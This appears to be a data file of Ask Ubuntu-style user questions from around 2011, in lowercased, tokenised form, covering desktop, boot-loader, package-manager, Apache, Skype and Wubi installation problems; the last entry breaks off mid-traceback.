64709	rsibreak or xfce4-time-out-plugin like software ?	i wanted a software just like rsibreak for kde4 or xfce4-time-out-plugin for xfce4 desktop env , however , xfce4-time-out-plugin does n't have a command line interface , which is needed when system hibernate and resume . i wanted some program that best fit in for xfce desktop , or i 'll have to hack the source code of xfce4-time-out-plugin myself .
64710	will the mini dvd iso include the media codecs and ubuntu restricted extras ?	i am currently torn between the regular cd iso and the mini dvd iso which i read will include gimp , pitivi etc . i will like to know the list of apps and codecs included in the mini dvd iso . most of my friends ca n't try ubuntu because they just do n't want to go through the hussle of installing codecs and stuff so the mini dvd , if it includes the media codecs and apps like vlc will be great for newbies .
64711	how to use clock to run program on time ?	for example : i want to set when 6:00 am it plays 1.mp3 ( if 2.mp3 is playing then close 2.mp3 ) . when 18:00 it plays 2.mp3 to replace 1.mp3 ( replace means close 1.mp3 and play 2.mp3 ) . everyday was the above sequence . how to do it ?
64712	how do i stop the default folders from being reset if they 're in an sshfs location ?	last time i was on my laptop i set the default folders for ubuntu to directories on another computer with sshfs , but every time i restart my laptop , it just resets everything to /home/thomas ( since i 've deleted the respective directories on my laptop ) . i 'm assuming this is because it starts sshfs in the fstab after it loads the locations to the default folders . how can i fix this ? these are the default folders i 'm referring to , by the way : they get reset back to /home/thomas after being set to folders in the directory mounted for sshfs , /home/thomas/files/ .
64716	how do i stop my netbook from sleeping when i pull the power ?	when i 'm using my computer and unplug it , i would rather not have it go into sleep mode which it currently does . how do i fix that ? a concrete example of this is the last time where i was actively skyping someone , the power cable was pulled by accident as it was tangled around a chair that someone pulled out and the computer went into sleep mode so i had to slide the power button to get back to the login screen . this is opposed to the normal behavior of sliding the power button which shows the `` shut down the computer '' dialogue . i have a samsung n150 and i 'm running natty .
64717	keyboard layout resets on every startup	i want to use `` german , no dead keys '' ( as `` tot '' as the layout . whenever i log into kde from kdm , i get the regular `` german '' keyboard . in other questions here i read that you have to switch the keyboard in the login screen , but apparently kdm does not offer that option . interstingly , it show `` tot '' in the systray when i log in , but then switches to `` de '' once the jingle plays . what can i do about that ?
64718	ubuntu software center not working ; says the package catalog needs repair	when i want to install anything in ubuntu software center i get this message :
64721	reloading the package manager gives a gpg error	reloading the package manager gives me an error : w : gpg error : http : //security.ubuntu.com oneiric-security release : the following signatures were invalid : badsig 40976eaf437d05b5 ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > w : a error occurred during the signature verification . the repository is not updated and the previous index files will be used . gpg error : http : //extras.ubuntu.com oneiric release : the following signatures were invalid : badsig 16126d3a3e5c1192 ubuntu extras archive automatic signing key < ftpmaster @ ubuntu.com > w : gpg error : http : //in.archive.ubuntu.com oneiric-backports release : the following signatures were invalid : badsig 40976eaf437d05b5 ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > w : gpg error : http : //ppa.launchpad.net oneiric release : the following signatures were invalid : badsig 73ad8184264ce9c6 launchpad ppa for simon schneegans w : gpg error : http : //ppa.launchpad.net oneiric release : the following signatures could n't be verified because the public key is not available : no_pubkey c2518248eea14886 w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/oneiric/release w : some index files failed to download . they have been ignored , or old ones used instead . what can i do about it ?
64723	how can i stop skype from stalling or at least automatically detect the failure and restart it ?	i have ubuntu on 3 different computers a samsung nc10 , a samsung n150 and a desktop computer with a xeon in it and some nvidia graphics card ( do n't know the exact specs offhand ) , they are all exhibiting the same issue with skype . every once in a while skype will stall in the sense that i can still use the skype ui , but i wo n't receive any notifications , if i try to call someone it will say `` conference call 1 participant '' and it wo n't call that person . if i open a chat and send a chat message , i get the little ( ! ) icon indicating that it was n't sent . then if i restart skype the message wo n't be saved anywhere . if i copy the message , i ca n't paste after closing down skype . instead i need paste it somewhere to retrieve it later . it seems like this issue is more likely to happen if i start skype on a computer that has n't received messages in a while , and during the message syncing it can lock , but it 's certainly not the only time . is this a known issue with a workaround or is there some way for me to automatically get notified that skype is exhibiting this behavior so i can restart it ? both maverick and natty has exhibited this behavior and has been happening to me for months , i thought it was just something related to my netbooks but since the desktop computer i have also experiences this it seems like a general issue .
64725	java will not run in chromium , google chrome and firefox	i am having major issues with ubuntu and kubuntu with regards to java on websites using chromium , google chrome or firefox . i have tried everything to install java , but it 's not happening . ubuntu 10.10 is fine , but the new unity will not run java . can anyone provide a point by point way to install java ? installing icedtea-plugin does n't work
64727	how to set appearance preferences visual effect to `` extra '' ?	i have installed ubuntu 10.10 on my dell inspiron 15r queen 3gb ram and i5 processor and unable to set the appearance preferences visual effects to extra mode . tell me how can i do that ?
64729	how to change the wallpaper of all clients using puppet ?	i have set up puppet ( central management server ) . can anyone tell me how to change wallpapers of all clients from this puppet server ?
64730	losing minimized app instances	ok , to start off , i 'm running ubuntu 11.10 ( beta ) on my 2010 macbook . the problem i 'm having is that when i have multiple instances of an application running and i minimize one i lose it . i 've tried alt-tab , super-w and any other shortcuts i could find on the net , but nothing will bring back the minimized window . it only brings up the active window ( s ) . again , clicking on the dock icon only brings up an expo-type display of the active application windows , no minimized ones . if someone could tell me a keyboard shortcut or something to work around this i would eternally grateful . this is really getting on my nerves and presents serious issues when i 'm working on a research paper and keep losing my chromium windows .
64731	installing apt-cacher server for two ubuntu versions	is it possible to have apt-cacher server for both ubuntu version 10.04 & 10.10 in one machine ? if yes can someone explain pls . the first cd cache of ubuntu 10.10 works fine . i have imported the second cd cache of ubuntu version 10.04 , and now when i update ubuntu 10.04 client , i get the following error.. root @ tme51 : /etc/apt # apt-get update err http : //172.29.32.9 lucid release.gpg could not connect to 172.29.32.9:3142 ( 172.29.32.9 ) . - connect ( 111 : connection refused ) err http : //172.29.32.9/ubuntu/ lucid/main translation-en_in unable to connect to 172.29.32.9:3142 : err http : //172.29.32.9/ubuntu/ lucid/restricted translation-en_in unable to connect to 172.29.32.9:3142 : err http : //172.29.32.9/ubuntu/ lucid/universe translation-en_in unable to connect to 172.29.32.9:3142 : err http : //172.29.32.9/ubuntu/ lucid/multiverse translation-en_in unable to connect to 172.29.32.9:3142 : reading package lists ... done w : failed to fetch http : //172.29.32.9:142/ubuntu/dists/lucid/release.gpg could not connect to 172.29.32.9:3142 ( 172.29.32.9 ) . - connect ( 111 : connection refused ) w : failed to fetch http : //172.29.32.9:142/ubuntu/dists/lucid/main/i18n/translation-en_in.bz2 unable to connect to 172.29.32.9:3142 : w : failed to fetch http : //172.29.32.9:142/ubuntu/dists/lucid/restricted/i18n/translation-en_in.bz2 unable to connect to 172.29.32.9:3142 : w : failed to fetch http : //172.29.32.9:142/ubuntu/dists/lucid/universe/i18n/translation-en_in.bz2 unable to connect to 172.29.32.9:3142 : w : failed to fetch http : //172.29.32.9:142/ubuntu/dists/lucid/multiverse/i18n/translation-en_in.bz2 unable to connect to 172.29.32.9:3142 : w : some index files failed to download , they have been ignored , or old ones used instead .
64732	slow i/o on an sdhc card	i installed ubuntu desktop version 11.04 on the little nas box i 'm building . i did n't purchase hdd yet , so i tried to install ubuntu on the sdhc card . but it 's terribly slow ! i would expect it to be faster than normal 5400rpm hdd , since seek times on any flash memory is low . pc details : 2gb ddr3 ram , 1.8 dual core atom , asrock d525 mobo , and 8gb sd card . in theory this should be more than enough for ubuntu . but , few things worry me . first of all i believe i connected card reader to usb port . so that would limit speed . in the face of the fact that reader resides on usb , is this slowness expected ? i ran ubuntu test suit , and on hdd it reported reading speed 800mb/s . how should i check device speed ? is there any other way ?
64733	how do i run rubymine as a regular user ?	i installed rubymine on ubuntu as instructed on their site ( extract and run a bash script from bin ) . currently , when i want to run the application i need to run this script from terminal as super user . what to do in order to run it like every normal app ? i also noticed that auto completion does not work on rubymine , do you know what cause that ?
64734	black screen after updating ubuntu 11.04 and mobility hd 4250	i have an damn annoying problem , the lag gets almost away with the new drivers of ati , but now i have that problem after updating ubuntu i get the damn black screen when booting . how to fix this , i have reinstalled 2 times and this happens always . i think all is ok , because ram test passes and hdd test passes too , and i have dual-booted windows 7 with ubuntu , and windows 7 works all ok , so i dont think its a hardware failure . i got this black screen by installing updates , i have reinstalled few times and it always happens when i install updates .
64735	understanding machine config , multiprocessor or multi-core or both ?	i want to know how many processors my ubuntu box has and if they are multicore . i did cat /proc/cpuinfo and i see something like this processor : 0 vendor_id : genuineintel cpu family : 6 model : 15 model name : intel ( r ) core ( tm ) 2 quad cpu q6600 @ 2.40ghz stepping : 11 cpu mhz : 1603.000 cache size : 4096 kb physical id : 0 siblings : 4 core id : 0 cpu cores : 4 apicid : 0 initial apicid : 0 fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 10 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx lm constan t_tsc arch_perfmon pebs bts aperfmperf pni dtes64 monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr pdcm lahf_lm dts tpr_shadow vnmi flexpriority bogomips : 4787.19 clflush size : 64 cache_alignment : 64 address sizes : 36 bits physical , 48 bits virtual power management : notably , i saw such data block four times from processor : 0 to processor : 4 and each time i see cpu cores : 4 i want to know what does that mean ? is this machine has 4 processors and each processor has 4-cores ? please let me know thank you
64738	sandy bridge power regression	ubuntu 11.10 drives my sandy-bridge laptop fan crazy , just 1 week before official release ! i thought it was a beta issue when testing daily builds on a regular basis , but i guess i was wrong ... is the cause of this power regression tracked down ? will this be fixed after release ? should i even consider updating to 11.10 later on ... ? ? ?
64739	when you type out an application name , do you need to click on one of the suggestions using your mouse ?	i am deciding to download ubuntu . i have a small question about its ui . when you type out an application name , do you need to click on one of the suggestions using your mouse ? or can you just press enter to start the highlighted application ? is it possible to navigate through the suggested apps that match your query using your keyboard ?
64746	virtualhosts using additional ports , apache returns a 403 ?	right about now i 'm going out of my head trying to set up my development environment on my new laptop . i did this on my old laptop in 15 minutes back in july , but this time it 's stumping me . i setup apache , and everything worked . then i altered the document root from /var/www & added 3 ports in my ports.conf like this : namevirtualhost *:80 namevirtualhost *:591 namevirtualhost *:8008 namevirtualhost *:8080 listen 80 listen 591 listen 8008 listen 8080 < virtualhost *:80 > servername 127.0.0.1 documentroot /home/devon/code/http/080-main < /virtualhost > < virtualhost *:591 > servername 127.0.0.1 documentroot /home/devon/code/http/591-fsr < /virtualhost > < virtualhost *:8008 > servername 127.0.0.1 documentroot /home/devon/code/http/8008-port < /virtualhost > < virtualhost *:8080 > servername 127.0.0.1 documentroot /home/devon/code/http/8080-port < /virtualhost > ... now , i get 403 errors at every port . so i 've been googling this and that led me to chown the directories so www-data group can access them . that did n't help though . so i chmod 'd the directories to 755 , 775 , 777 ... but none of that helped . i even found an answer that led me to chmod my /home to 751 ( recursively ) and still nothing changed . so if it 's not a permissions or a group problem , what else could it be ? as you can see , the permissions look correct ? drwxr-xr-x 2 devon www-data 4.0k 2011-10-07 08:33 080-main/ drwxr-xr-x 8 devon www-data 4.0k 2011-10-04 00:57 591-fsr/ drwxr-xr-x 2 devon www-data 4.0k 2011-10-07 08:45 8008-port/ drwxr-xr-x 2 devon www-data 4.0k 2011-10-07 08:46 8080-port/ ( i know the ports work , 'cause when i go localhost:678369 , which is not a port i specify , then it does n't reach the server , whereas the localhost:591 & the other ports i specified , reaches the server & returns a 403 . so i know apache 's working & that the configuration files are working correctly . ) update as requested : drwxr-xr-x 6 devon www-data 4.0k 2011-10-07 15:31 http & the files within ... drwxr-xr-x 6 devon www-data 4.0k 2011-10-07 15:31 . drwx -- -- -- 14 devon devon 4.0k 2011-10-07 08:39 .. drwxr-xr-x 2 devon www-data 4.0k 2011-10-07 08:33 080-main drwxr-xr-x 8 devon www-data 4.0k 2011-10-04 00:57 591-fsr drwxr-xr-x 2 devon www-data 4.0k 2011-10-07 08:45 8008-port drwxr-xr-x 2 devon www-data 4.0k 2011-10-07 08:46 8080-port
64747	where is the xorg.conf file in kubuntu 11.10 ?	how do i edit the xorg.conf file , when there isnt one in kubuntu 11.10 ? i want to alter the video driver , but how do i do this in 11.10 ? the reason is that i believe i am having issues after a recent upgrage in 11.10 , and now my desktop effects no longer work when using the opengl compositing , even with the functionality checks disabled ... however , is there a way to alter this file and have they moved it to a new location ? any ideas ? thanks
64749	accidentally added a bunch of junk files to ubuntu one , how can i clean it up ?	i have ubuntu one set to sync between three computers - a laptop ( main one ) , a desktop with ubuntu , and the same desktop with windows . i ( accidentally ) set up u1 to sync the windows documents folder to every other computer , which added a gigabyte of freaking useless junk on to every computer and the cloud . i went on the laptop to the website and deleted the windows crap , and to make sure that it would n't sync , i got rid of it under devices . but whenever i log in , i always get an ubuntu one notify-osd alert saying `` 'whatever_file.meh ' '' and 1658 others are being uploaded to your personal cloud . how do i fix this ? without removing all of my ubuntu one accounts preferably .
64751	what does it mean when update manager wants to do a `` partial '' update ?	this morning on my laptop i ran update manager ( i 'm running 11.04 ) and i received a message that i could only run a partial update . being fairly new to ubuntu , i was n't sure what i should do , but it appeared to want to do some updates but not all , and even remove some things . it gave several possible reasons for this , one of them being that this might occur with a `` pre-release version . '' since 11.10 is coming out next week , i figured that might be the cause , so i had it go ahead . a few hours later , i ran update manager on my desktop computer , and was presented with the same choice . since it appeared to have worked on my desktop , i chose to let it apply the `` partial update '' , too . since then , on both computers , i 've noticed a few little bugs . nothing big , but nothing i had been previously experiencing . and in the history folder of the software center , no updates are listed as having been applied today . so my question is , what does it mean when update manager wants to run a partial update ? is it better not to accept it ( and thus not do any updates ) ?
64753	video problem after upgrade 10.04 to 11.04	after upgrading to 11.04 , screen shows 'razor-type ' diagonal lines , overlapping text , missing lines etc . which go away , when move ( refresh ) the page up or down . kernel version 2.6.38-11-generic . graphics card : mobility radeon 9600 m10 following these instructions , i d/l ati fglrx drivers 9-3-x86.x86_64 , but never install completely . i get the msg -iscurrentdistro , then i try -- listpgk and then -- buildpkg ubuntu/9.04 supposingly to build drivers for earlier version . but no matter what i do , the drivers never install completely : get the msg errors were encountered while processing : fglrx-kernel-source libamdxvbal xorg-driver-fglrx xorg-driver-fglrx fglrx-amdcccle read somewhere that this could be broken packages , and with synaptics tried to fix first 2 files that were broken , but then the error is : can not install fglrx-kernel-source ... . tried to go back to the open source drivers as hereremove fglrx and install ati from scratch the drivers install , but the 'razor ' effects , overlapping lines etc , come back . by the way , tried system > administation > additional drivers , found fglrx drivers , but pressing 'activate ' does n't do anything . problem remains with unity or classic `` view '' is the kernel/card too old for both the open source and the fglrx drivers ? or maybe the buffer on the graphics card is messed up ? t thank you all stanlex
64759	lightdm : checking battery state - no login screen	i upgraded to oneiric beta2 for some reasons i prevously explained . now i can not use lightdm . gdm works fine but can not use lightdm . when booting past grub the message is checking battery state ... [ ok ] and it checks forever . is there a work around ? i tried the command sudo dpkg-reconfigure lightdm which gave the result : dpkg-maintscript-helper : warning : environment variable dpkg_maintscript_name missing dpkg-maintscript-helper : warning : environment variable dpkg_maintscript_package missing
64760	how soon will ubuntu one have all the features of a full on backup service ?	i like being able to pause the uploads for different time periods like i had with carbonite . also backup services allow people to access multiple versions of a file if their computer goes under . i like these features and i want to know my data is relatively secure which i am sure it is . if you are syncing files anyway you might as well back them up too . my upload bandwidth is limited and i want it handled by one service not two . also i want to be able to limit the bandwidth that is taken by ubuntu one as it slows my internet down . i hope that you are willing to listen to your customers needs . have your ceo give me a time frame as to when this will happen .
64761	install from usb to usb ? - i am stuck ?	i am stuck and need some help . i have a broken hard drive and i am running ubuntu from a usb booting it in `` try '' mode . that works most of the time until i need to install something like flash and i can not do it because it will not write to the flash drive . so i need to install ubuntu to a flash drive . i attempted to bootup and install and keeps getting stuck or i am doing something wrong . here are my steps : i downloaded the alternate 11.10 version and use unetboot to write the iso to the usb stick . then i bootup and tell it to install ( the usb drive i will be writing to is in the computer also ) i go through the steps and it ask me setup my internet . i use wireless and do not have a wired connection and i manually setup the connection . it works as far as i can tell , after that it ask for a hostname and ubuntu is there so i use that . then it ask for a domain name and i enter one ( i run a website and use that name , does that mater ? ) then it goes to a blank screen and i realize it is a command line and i can enter info there . this is where i get stuck , i attempted to follow the info provided here but i am confused and need some advice on how i go about getting this installed . help ! note i am using the alternate installer as my flash drive i am installing to has less than 4.5 gb ( it is a 4gb flash drive )
64765	i downloaded dwarf fortress . why wo n't it run ?	i downloaded the version of dwarf fortress for linux onto my computer , but when i click on the df file , it does n't do anything . when i run it in a terminal , it gives me this message : error while loading shared libraries : libsdl_ttf-2.0.so.0 : can not open shared object file : no such file or directory
64766	how to create a group which is allowed to use the adduser command ?	does anyone know the commands for each step listed below ? create a new sudoers group called privilege1 allowing the use of the adduser command and nothing more . the sudoers configuration file is located at /etc/sudoers now create a new user called user1 with the adduser command . then add user user1 to the sudoers privilege1 group to the /etc/sudoers file . the final step is to test if that user user1 can now use the adduser command .
64768	why is my computer freezing ?	i have ubuntu 11.04 installed , and all the updates . my computer freezes if i just start ubuntu and wait a while , whether or not i have a program running . it is completely dead . i can not access a virtual terminal with ctrl + alt + f2 or f3 . environment : i have set power manager to `` never suspend '' i have disabled the screensaver . regression : i have tried the proprietary drivers for ati hd6310 gpu , and also tried with them disabled . i have tried using unity and also classic ubuntu ( no special effects ) . apart from waiting until the software catches up with the hardware , is there anything else that i can do to stop my computer freezing under ubuntu ?
64770	aptget without networking	i had a accident and i removed network-manager package , now i can not get network access or internet access to apt-get install it back and reconfig the internet what should i do ? download the dvd and add a new source ?
64771	can no longer boot with refit and grub on early 2006 macbook pro	i do n't know what happened to cause this . i have snow leopard , ubuntu 11.04 natty narwhal and windows xp sp3 on my early 2006 macbook pro . it is a core duo unit , not core 2 duo , so it is 32-bit only - model identifier macbookpro1,1 . i use refit 0.14 for my boot menu . for some reason neither xp nor ubuntu would boot anymore . i 'd just get a black screen with a rapidly flashing underscore in the top-left corner . having both those oses failing to boot suggested a problem with the boot loader in my mbr . the refit partition tool verified that my mbr partitions were still synced with my gpt partitions , so i rewrote my mbr partition table with fdisk while booted from parted magic : # fdisk /dev/sda ( fdisk warns about the disk having a gpt . i press on anyway . ) p ( print the existing partition table to make sure it 's ok. ) w ( write the old partition table back to disk . this also writes a new mbr boot loader . ) after this xp would boot but ubuntu would not , with the same symptom . now i used update-grub while chrooted into ubuntu from parted magic : # mount /dev/sda3 /mnt # mount -- bind /dev /mnt/dev # mount -- bind /sys /mnt/sys # mount -- bind /proc /mnt/proc # chroot /mnt chroot issues some warnings about not being able to identify some group ids . i do n't know why that happens , or whether it is a problem . at this point while i am still booted off of parted magic 's kernel , i am running from natty 's filesystem . # update-grub update-grub detects each of my operating systems then claims to complete successfully , but still wo n't boot . i asked this same question over at refit 's sourceforge support forum but there have been no replies yet . i also googled quite a bit , and see many who have the same black screen problem , but none of their situations seem quite like mine . thanks for any help you can give me . -- don quixote
64772	how to install mariadb ?	what is the most stable/safest way to install mariadb ?
64773	ubuntu 10.04 and fedora 14 grub conflict	i tried to triple boot windows xp , fedora 14 and ubuntu 10.04 . i first installed windows xp , then fedora followed by ubuntu . the problem is that i do n't get option to boot ubuntu while xp boots fine . it seems ubuntu was unable to replace fedora 's grub with its own at mbr . looking at their grub conf file , fedora and ubuntu identifies same harddisk as two different devices and i do have another 80 gb harddisk which does n't have any os . below is the details on my partitions and partial information from grub files of both os . device boot start end blocks id system /dev/sda1 * 63 40965749 20482843+ 7 hpfs/ntfs /dev/sda2 102414436 312576704 105081134+ f w95 ext 'd ( lba ) /dev/sda3 40965750 102414374 30724312+ 83 linux - /home ( for fedora ) /dev/sda5 102414438 204812684 51199123+ 7 hpfs/ntfs /dev/sda6 204812748 253634219 24410736 83 linux -- ubuntu /dev/sda7 253634283 302455754 24410736 83 linux -- fedora /dev/sda8 302455818 312576704 5060443+ 82 linux swap / solaris grub.cfg from ubuntu # # # begin /etc/grub.d/10_linux # # # menuentry 'ubuntu , with linux 2.6.32-21-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod ext2 set root= ' ( hd1,7 ) ' search -- no-floppy -- fs-uuid -- set cd55e078-a2c1-4d8a-9e87-ae838b6f4a05 linux /boot/vmlinuz-2.6.32-21-generic root=uuid=cd55e078-a2c1-4d8a-9e87-ae838b6f4a05 ro quiet splash initrd /boot/initrd.img-2.6.32-21-generic } menuentry 'ubuntu , with linux 2.6.32-21-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod ext2 set root= ' ( hd1,7 ) ' search -- no-floppy -- fs-uuid -- set cd55e078-a2c1-4d8a-9e87-ae838b6f4a05 echo 'loading linux 2.6.32-21-generic ... ' linux /boot/vmlinuz-2.6.32-21-generic root=uuid=cd55e078-a2c1-4d8a-9e87-ae838b6f4a05 ro single echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-2.6.32-21-generic } # # # end /etc/grub.d/10_linux # # # # # # begin /etc/grub.d/20_memtest86+ # # # menuentry `` memory test ( memtest86+ ) '' { insmod ext2 set root= ' ( hd1,7 ) ' search -- no-floppy -- fs-uuid -- set cd55e078-a2c1-4d8a-9e87-ae838b6f4a05 linux16 /boot/memtest86+.bin } menuentry `` memory test ( memtest86+ , serial console 115200 ) '' { insmod ext2 set root= ' ( hd1,7 ) ' search -- no-floppy -- fs-uuid -- set cd55e078-a2c1-4d8a-9e87-ae838b6f4a05 linux16 /boot/memtest86+.bin console=ttys0,115200n8 } # # # end /etc/grub.d/20_memtest86+ # # # # # # begin /etc/grub.d/30_os-prober # # # menuentry `` microsoft windows xp professional ( on /dev/sdb1 ) '' { insmod ntfs set root= ' ( hd1,1 ) ' search -- no-floppy -- fs-uuid -- set cad48cc6d48cb5eb drivemap -s ( hd0 ) $ { root } chainloader +1 } menuentry `` fedora ( 2.6.35.14-96.fc14.i686 ) ( on /dev/sdb6 ) '' { insmod ext2 set root= ' ( hd1,6 ) ' search -- no-floppy -- fs-uuid -- set 6aee34cf-f77a-489a-9361-85d07194b84b linux /boot/vmlinuz-2.6.35.14-96.fc14.i686 ro root=uuid=6aee34cf-f77a-489a-9361-85d07194b84b rd_no_luks rd_no_lvm rd_no_md rd_no_dm lang=en_us.utf-8 sysfont=latarcyrheb-sun16 keyboardtype=pc keytable=us rhgb quiet initrd /boot/initramfs-2.6.35.14-96.fc14.i686.img } menuentry `` fedora ( 2.6.35.6-45.fc14.i686 ) ( on /dev/sdb6 ) '' { insmod ext2 set root= ' ( hd1,6 ) ' search -- no-floppy -- fs-uuid -- set 6aee34cf-f77a-489a-9361-85d07194b84b linux /boot/vmlinuz-2.6.35.6-45.fc14.i686 ro root=uuid=6aee34cf-f77a-489a-9361-85d07194b84b rd_no_luks rd_no_lvm rd_no_md rd_no_dm lang=en_us.utf-8 sysfont=latarcyrheb-sun16 keyboardtype=pc keytable=us rhgb quiet initrd /boot/initramfs-2.6.35.6-45.fc14.i686.img } # # # end /etc/grub.d/30_os-prober # # # grub.conf from fedora default=0 timeout=5 splashimage= ( hd0,5 ) /boot/grub/splash.xpm.gz hiddenmenu title fedora ( 2.6.35.14-96.fc14.i686 ) root ( hd0,5 ) kernel /boot/vmlinuz-2.6.35.14-96.fc14.i686 ro root=uuid=6aee34cf-f77a-489a-9361-85d07194b84b rd_no_luks rd_no_lvm rd_no_md rd_no_dm lang=en_us.utf-8 sysfont=latarcyrheb-sun16 keyboardtype=pc keytable=us rhgb quiet initrd /boot/initramfs-2.6.35.14-96.fc14.i686.img title fedora ( 2.6.35.6-45.fc14.i686 ) root ( hd0,5 ) kernel /boot/vmlinuz-2.6.35.6-45.fc14.i686 ro root=uuid=6aee34cf-f77a-489a-9361-85d07194b84b rd_no_luks rd_no_lvm rd_no_md rd_no_dm lang=en_us.utf-8 sysfont=latarcyrheb-sun16 keyboardtype=pc keytable=us rhgb quiet initrd /boot/initramfs-2.6.35.6-45.fc14.i686.img title other rootnoverify ( hd0,0 ) chainloader +1
64780	how to show day/month number of events in datetime indicator ?	i configured the datetime indicator to show upcoming evolution events . i 'm using ubuntu 11.04 but it is the same with 11.10 . there is a way to show number of day and month in events list , and not only the day name ? without this the list is very confusing because i see `` saturday '' but do n't understand if it 's the next , or more later . look at this screenshot : for the `` joomladay '' event , i wish to see `` sab 22/10 9.00 '' or could be ok also `` sab 22 ott 9.00 '' .
64783	cheapest phone which can plug and play into ubuntu for tethering ?	can someone please show me a very very very cheap phone which i can plug into my laptop which uses ubuntu 10.04 so i can use the phone as a modem , i.e . tethering the data allowance on my contract . the phone must be very cheap it must simply be plug and play , no configuring it must be unlocked , or free to unlock or cost less than £60 including the cost to unlock it i understand that android 2.2 phones fit the above requirements except the 3rd requirement afaik . the cheapest android phone i have found is about £60 , but costs about £30 to unlock .
64785	how do i set the banshee context menu to move to trash instead of delete from drive ?	i am using banshee as my media player . when i right click a track , the context menu has a 'delete from drive ' option . when i use this , it deletes the file . i would like for the file to be sent to trash ( recycle bin ) instead . is there a way to do this , or a plugin or extension for this ?
64786	microsoft office not properly working in wine	i had installed microsoft office through wine on my ubuntu desktop . when i close my opened microsoft word document , i was shown a dialog box that shows microsoft office word has encountered a problem . also , when i try to open microsoft powerpoint , i get a message that microsoft powerpoint failed to start in safe mode . then i moved to skydrive with my hotmail account . but is there any solution to this problem ?
64788	how to install ms internet explorer 7 , 8 or 9 ?	i recently started using ubuntu 11.4 as my primary os . iâm trying to find a way to run internet explorer on it . is there a way to install on linux/wine ie7 or higher versions ? i saw only ie4linux which contains ie6 ... the problem is on browsershots and similar serviece that the code must be confidential so i need some intranet solution without passing screens to other companies
64789	how do i install tibesti screencaster ?	why wo n't tibesti screencaster install on ubuntu 11.10 ?
64792	how can i get into ubuntu 11.04 when there 's no boot menu for it ?	i have just installed ubuntu 11.04 along with my existing vista and i see no boot menu for it on start up . i googled for it and got the answer that let me modify the grub file and then execute update-grub to solve it . but all of this has be to done after you can get into the system right ? my question is how can i even get into the ubuntu system if there 's no boot menu ? i tried pressing shift during boot , but the screen then became still untill i released it and then boot into vista . i installed ubuntu with usb stick , but i see no option of doing this on its menu .
64797	how to get the gnome 3 login manager installed ?	i was wondering if it is possible to get the gnome 3.2 gdm login theme working on ubuntu 11.10 . i installed gdm alongside lightdm , but the gdm greeter is really ugly .
64801	will 11.10 have kernel 3.1 when it hits stable release or not ?	hello i am curious if ubuntu 11.10 will get kernel 3.1 via updates when it hits stable release ?
64811	how can i change what time deja dup does its backup ?	i believe it automatically runs at midnight , but i would rather it run during an off-peak internet period to save my quota . how can i change the time it runs ?
64812	recover files without an extension after deleting them with a bash command	last night , i used exiftool to batch rename a collection of .mov files . some of the files were renamed as required , but many of them were left without an extension . i think the required exif tag that i used in the exiftool command was missing from some the files , resulting in ~140 .mov files renamed in a timestamp format without an extension . rather than manually appending .mov to each file , i searched google for a script to automate the process . i adapted an example and executed it ( *+0100 refers to common string at the end of all the target files ) : $ for i in *+0100 ; do mv `` $ i '' `` `basename $ i *+0100`.mov '' ; done for some reason , ~140 files disappeared and i was left with a single file with a .mov extension . not quite what i was expecting ! i searched the partition with photorec , but i have n't been able to recover the files . is there any other way i may be able to recover them ? these particular family videos were some of the few that i had not yet backed up .
64813	permission denied error when trying to install with wubi	i run into problem when tried to install ubuntu 11.04 on windows 7 using wubi installer . it downloads the image for sometime and ends up with the error that says permission denied : for more details see the log file in the log it seems to be like downloaderror : problem connecting to tracker - urlopen error ( 10060 , 'operation timed out ' ) but my network is good and i checked it . tried using wubi several times , but ends up with same problem . log content : 10-08 16:56 debug tasklist : # # # finished get_metalink 10-08 16:56 debug tasklist : new task download 10-08 16:56 debug tasklist : # # # running download ... 10-08 16:56 debug btdownloader : downloading http : //releases.ubuntu.com/11.04/ubuntu-11.04-desktop-amd64.iso.torrent > c : \ubuntu\install\ubuntu-11.04-desktop-amd64.iso 10-08 18:02 error tasklist : traceback ( most recent call last ) : file `` \lib\bittorrent\rawserver.py '' , line 229 , in listen_forever file `` \lib\wubi\backends\common\btdownloader.py '' , line 70 , in error_callback downloaderror : traceback ( most recent call last ) : file `` \lib\bittorrent\rawserver.py '' , line 221 , in listen_forever file `` \lib\bittorrent\rerequester.py '' , line 96 , in fail file `` \lib\wubi\backends\common\btdownloader.py '' , line 70 , in error_callback downloaderror : problem connecting to tracker - urlopen error ( 10060 , 'operation timed out ' ) traceback ( most recent call last ) : file `` \lib\wubi\backends\common\tasklist.py '' , line 197 , in __call__ file `` \lib\wubi\backends\common\btdownloader.py '' , line 79 , in download file `` \lib\bittorrent\download.py '' , line 303 , in download file `` \lib\bittorrent\rawserver.py '' , line 256 , in listen_forever file `` \lib\wubi\backends\common\btdownloader.py '' , line 70 , in error_callback downloaderror : traceback ( most recent call last ) : file `` \lib\bittorrent\rawserver.py '' , line 229 , in listen_forever file `` \lib\wubi\backends\common\btdownloader.py '' , line 70 , in error_callback downloaderror : traceback ( most recent call last ) : file `` \lib\bittorrent\rawserver.py '' , line 221 , in listen_forever file `` \lib\bittorrent\rerequester.py '' , line 96 , in fail file `` \lib\wubi\backends\common\btdownloader.py '' , line 70 , in error_callback downloaderror : problem connecting to tracker - urlopen error ( 10060 , 'operation timed out ' ) 10-08 18:02 error tasklist : non fatal error traceback ( most recent call last ) : file `` \lib\bittorrent\rawserver.py '' , line 229 , in listen_forever file `` \lib\wubi\backends\common\btdownloader.py '' , line 70 , in error_callback downloaderror : traceback ( most recent call last ) : file `` \lib\bittorrent\rawserver.py '' , line 221 , in listen_forever file `` \lib\bittorrent\rerequester.py '' , line 96 , in fail file `` \lib\wubi\backends\common\btdownloader.py '' , line 70 , in error_callback downloaderror : problem connecting to tracker - urlopen error ( 10060 , 'operation timed out ' ) in task download 10-08 18:02 debug tasklist : # # # finished download 10-08 18:02 error tasklist : [ errno 13 ] permission denied : u'c : \\ubuntu\\install\\ubuntu-11.04-desktop-amd64.iso' traceback ( most recent call last ) : file `` \lib\wubi\backends\common\tasklist.py '' , line 197 , in 